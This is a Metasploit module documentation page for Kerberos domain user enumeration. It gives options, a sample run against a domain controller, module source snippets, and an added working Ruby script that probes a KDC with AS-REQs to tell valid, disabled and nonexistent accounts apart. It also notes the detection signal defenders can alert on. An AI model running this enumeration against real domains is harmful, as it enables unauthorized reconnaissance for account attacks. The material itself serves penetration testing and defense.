Kerberos Domain User Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/gather/kerberos_enumusers Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
Source code: modules/auxiliary/gather/kerberos_enumusers.rb
Disclosure date: -
Last modification time: 2019-11-05 18:32:45 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: -

This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users.

Module Ranking and Traits


Module Ranking:

  • normal: The module is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.

Basic Usage


This is an auxiliary module, so it has no exploit targets; set its options and run it (msfconsole also accepts exploit as an alias of run):

msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(kerberos_enumusers) > show options
    ... show and set options ...
msf auxiliary(kerberos_enumusers) > run

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • DOMAIN: The Domain Eg: demo.local

  • USER_FILE: Files containing usernames, one per line

Knowledge Base


The kerberos_enumusers module is used to enumerate valid Domain Users via Kerberos from a wholly unauthenticated perspective. It sends an AS-REQ for each candidate user without any pre-authentication data and keys on the KRB-ERROR the KDC returns: KDC_ERR_PREAUTH_REQUIRED means the user exists, KDC_ERR_C_PRINCIPAL_UNKNOWN means it does not, and KDC_ERR_CLIENT_REVOKED means the account exists but is disabled or locked out. No credentials are needed and no logon attempt is made against the account, so this does not consume failed-logon attempts.

Target


To use kerberos_enumusers, make sure you are able to connect to the Kerberos service on a Domain Controller.

Scenarios


The following demonstrates basic usage, using a custom wordlist, targeting a single Domain Controller to identify valid domain user accounts.

msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(kerberos_enumusers) > set DOMAIN MYDOMAIN
DOMAIN => MYDOMAIN
msf auxiliary(kerberos_enumusers) > set RHOST 192.168.5.1
RHOST => 192.168.5.1
msf auxiliary(kerberos_enumusers) > set USER_FILE /job/users.txt
USER_FILE => /job/users.txt
msf auxiliary(kerberos_enumusers) > run

[*] Validating options...
[*] Using domain: MYDOMAIN...
[*] 192.168.5.1:88 - Testing User: "bob"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.1:88 - User: "bob" is present
[*] 192.168.5.1:88 - Testing User: "alice"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.1:88 - User: "alice" is present
[*] 192.168.5.1:88 - Testing User: "matt"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.1:88 - User: "matt" is present
[*] 192.168.5.1:88 - Testing User: "guest"...
[*] 192.168.5.1:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have been revoked
[-] 192.168.5.1:88 - User: "guest" account disabled or locked out
[*] 192.168.5.1:88 - Testing User: "admint"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.1:88 - User: "admint" does not exist
[*] 192.168.5.1:88 - Testing User: "admin"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.1:88 - User: "admin" does not exist
[*] 192.168.5.1:88 - Testing User: "administrator"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.1:88 - User: "administrator" does not exist
[*] Auxiliary module execution completed
msf auxiliary(kerberos_enumusers) >
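The exchange behind the output above, as an added example that is not the module's own code (the module uses Metasploit's Rex::Proto::Kerberos library; this version builds the messages with Ruby's standard OpenSSL::ASN1). It assembles an AS-REQ that deliberately omits the padata field, sends it to the KDC over TCP with the 4-byte length prefix, and maps the error-code of the KRB-ERROR reply to the three verdicts the module prints. The build_krb_error helper fabricates KDC replies so the parsing path can be run offline; probe, the host, user and realm names are illustrative, and the handling of an AS-REP (an account with pre-authentication disabled) goes one step beyond what the module output shows.

```ruby
require 'openssl'
require 'socket'

A = OpenSSL::ASN1

# RFC 4120 error codes that the module's three verdicts are keyed on.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # "does not exist"
KDC_ERR_CLIENT_REVOKED      = 18  # "account disabled or locked out"
KDC_ERR_PREAUTH_REQUIRED    = 25  # "is present"

# Map a KRB-ERROR error-code to the verdict the module prints.
def classify(error_code)
  case error_code
  when KDC_ERR_PREAUTH_REQUIRED    then :present
  when KDC_ERR_CLIENT_REVOKED      then :disabled_or_locked
  when KDC_ERR_C_PRINCIPAL_UNKNOWN then :unknown
  else :other # anything else (e.g. a wrong realm) says nothing about the user
  end
end

# EXPLICIT context-specific tag [n] around one ASN.1 value; Kerberos uses these everywhere.
def ctx(n, value)
  A::ASN1Data.new([value], n, :CONTEXT_SPECIFIC)
end

# PrincipalName ::= SEQUENCE { name-type [0] Int32, name-string [1] SEQUENCE OF GeneralString }
def principal(name_type, *names)
  A::Sequence.new([ctx(0, A::Integer.new(name_type)),
                   ctx(1, A::Sequence.new(names.map { |s| A::GeneralString.new(s) }))])
end

# Build an AS-REQ with no pre-authentication data: the KDC's answer then depends only
# on whether the principal exists, which is the whole trick the module relies on.
def build_as_req(user, realm, nonce: rand(2**31))
  body = A::Sequence.new([
    ctx(0, A::BitString.new("\x00\x00\x00\x00".b)),        # kdc-options: none set
    ctx(1, principal(1, user)),                            # cname, NT-PRINCIPAL
    ctx(2, A::GeneralString.new(realm)),
    ctx(3, principal(2, 'krbtgt', realm)),                 # sname, NT-SRV-INST
    ctx(5, A::GeneralizedTime.new(Time.now.utc + 86_400)), # till
    ctx(7, A::Integer.new(nonce)),
    ctx(8, A::Sequence.new([A::Integer.new(18), A::Integer.new(23)])) # etypes offered
  ])
  kdc_req = A::Sequence.new([ctx(1, A::Integer.new(5)),    # pvno
                             ctx(2, A::Integer.new(10)),   # msg-type AS-REQ
                             ctx(4, body)])                # padata [3] deliberately absent
  A::ASN1Data.new([kdc_req], 10, :APPLICATION).to_der      # AS-REQ ::= [APPLICATION 10]
end

# Pull error-code [6] out of a KRB-ERROR ([APPLICATION 30]) message.
def parse_krb_error(der)
  top = A.decode(der)
  raise 'not a KRB-ERROR' unless top.tag_class == :APPLICATION && top.tag == 30
  field = top.value.first.value.find { |f| f.tag == 6 }
  raise 'KRB-ERROR without error-code' unless field
  field.value.first.value.to_i
end

# Constructed stand-in for a KDC reply, so the parsing path can be exercised offline.
def build_krb_error(error_code, realm)
  err = A::Sequence.new([
    ctx(0, A::Integer.new(5)), ctx(1, A::Integer.new(30)),
    ctx(4, A::GeneralizedTime.new(Time.now.utc)), ctx(5, A::Integer.new(0)),
    ctx(6, A::Integer.new(error_code)),
    ctx(9, A::GeneralString.new(realm)), ctx(10, principal(2, 'krbtgt', realm))
  ])
  A::ASN1Data.new([err], 30, :APPLICATION).to_der
end

# One probe against a real KDC over TCP (4-byte big-endian length prefix, RFC 4120 7.2.2).
# :present_no_preauth means an AS-REP ([APPLICATION 11]) came back instead of an error,
# i.e. the account exists and has pre-authentication disabled.
def probe(host, user, realm, port: 88, timeout: 10)
  req = build_as_req(user, realm)
  Socket.tcp(host, port, connect_timeout: timeout) do |sock|
    sock.write([req.bytesize].pack('N') + req)
    hdr = sock.read(4)
    raise 'no response from KDC' unless hdr && hdr.bytesize == 4
    resp = sock.read(hdr.unpack1('N'))
    top = A.decode(resp)
    return :present_no_preauth if top.tag_class == :APPLICATION && top.tag == 11
    classify(parse_krb_error(resp))
  end
end

if __FILE__ == $PROGRAM_NAME
  # Offline run over fabricated replies; against a live DC you would call e.g.
  # probe('192.168.5.1', 'bob', 'MYDOMAIN') once per name in USER_FILE.
  [25, 18, 6, 68].each do |code|
    puts "error-code #{code} => #{classify(parse_krb_error(build_krb_error(code, 'MYDOMAIN')))}"
  end
end
```

Because the request carries no padata, the KDC never evaluates a password, so the probes show up as Kerberos pre-authentication failures (event 4768 with the matching error code on the DC) rather than as failed logons, which is exactly why the technique is safe against lockout policies and why a high rate of KDC_ERR_C_PRINCIPAL_UNKNOWN from one source is the thing to alert on.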

Options


The kerberos_enumusers module only requires the RHOSTS, DOMAIN and USER_FILE options to run (RHOST, as used in the scenario above, is accepted as an alias of RHOSTS).

The DOMAIN option

This option is used to specify the target domain (the Kerberos realm). If the domain name is incorrect the KDC returns an error for every user, the module reports "Wrong DOMAIN Name? Check DOMAIN and retry..." and domain user account enumeration fails.

An example of setting DOMAIN:

set DOMAIN [domain name]

The USER_FILE option

This option is used to specify the file containing the list of user names to query the Domain Controller for, one per line, to identify whether each exists in the target domain. The module lowercases the names and removes duplicates before sending them.

An example of setting USER_FILE:

set USER_FILE [path to file]

The Timeout option

This option is used to specify the TCP timeout in seconds, i.e. how long the module waits to establish the connection to the Domain Controller and to read the response.

An example of setting Timeout:

set Timeout [value in seconds]


Msfconsole Usage


Here is how the gather/kerberos_enumusers auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/kerberos_enumusers

msf6 auxiliary(gather/kerberos_enumusers) > show info

       Name: Kerberos Domain User Enumeration
     Module: auxiliary/gather/kerberos_enumusers
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Matt Byrne <attackdebris[at]gmail.com>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DOMAIN                      yes       The Domain Eg: demo.local
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      88               yes       The target port
  Timeout    10               yes       The TCP timeout to establish connection and read data
  USER_FILE                   yes       Files containing usernames, one per line

Description:
  This module will enumerate valid Domain Users via Kerberos from an 
  unauthenticated perspective. It utilizes the different responses 
  returned by the service for valid and invalid users.

References:
  https://nmap.org/nsedoc/scripts/krb5-enum-users.html

Module Options


This is a complete list of options available in the gather/kerberos_enumusers auxiliary module:

msf6 auxiliary(gather/kerberos_enumusers) > show options

Module options (auxiliary/gather/kerberos_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      yes       The Domain Eg: demo.local
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      88               yes       The target port
   Timeout    10               yes       The TCP timeout to establish connection and read data
   USER_FILE                   yes       Files containing usernames, one per line

Advanced Options


Here is a complete list of advanced options supported by the gather/kerberos_enumusers auxiliary module:

msf6 auxiliary(gather/kerberos_enumusers) > show advanced

Module advanced options (auxiliary/gather/kerberos_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/kerberos_enumusers module can do:

msf6 auxiliary(gather/kerberos_enumusers) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/kerberos_enumusers auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/kerberos_enumusers) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Cannot read file <USER_FILE>


Here is a relevant code snippet related to the "Cannot read file <USER_FILE>" error message:

43:	    if File.readable? datastore['USER_FILE']
44:	      users = File.new(datastore['USER_FILE']).read.split
45:	      users.each { |u| u.downcase! }
46:	      users.uniq!
47:	    else
48:	      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
49:	    end
50:	    users
51:	  end
52:	
53:	  def run

<PEER> - User: "<USER>" account disabled or locked out


Here is a relevant code snippet related to the "<PEER> - User: "<USER>" account disabled or locked out" error message:

79:	          port: rport,
80:	          creds_name: 'Kerberos',
81:	          user: user
82:	        )
83:	      elsif test == ["KDC_ERR_CLIENT_REVOKED", "Clients credentials have been revoked"]
84:	        print_error("#{peer} - User: \"#{user}\" account disabled or locked out")
85:	      else
86:	        print_status("#{peer} - User: \"#{user}\" does not exist")
87:	      end
88:	    end
89:	  end

<PEER> - User: "<USER>" does not exist


Here is a relevant code snippet related to the "<PEER> - User: "<USER>" does not exist" error message:

81:	          user: user
82:	        )
83:	      elsif test == ["KDC_ERR_CLIENT_REVOKED", "Clients credentials have been revoked"]
84:	        print_error("#{peer} - User: \"#{user}\" account disabled or locked out")
85:	      else
86:	        print_status("#{peer} - User: \"#{user}\" does not exist")
87:	      end
88:	    end
89:	  end
90:	
91:	  def report_cred(opts)

<ERROR_INFO:0> - <ERROR_INFO:1>


Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:

114:	  def warn_error(res)
115:	    msg = ''
116:	
117:	    if Rex::Proto::Kerberos::Model::ERROR_CODES.key?(res.error_code)
118:	      error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
119:	      msg = "#{error_info[0]} - #{error_info[1]}"
120:	    else
121:	      msg = 'Wrong DOMAIN Name? Check DOMAIN and retry...'
122:	    end
123:	  end
124:	end



Authors


  • Matt Byrne <attackdebris[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
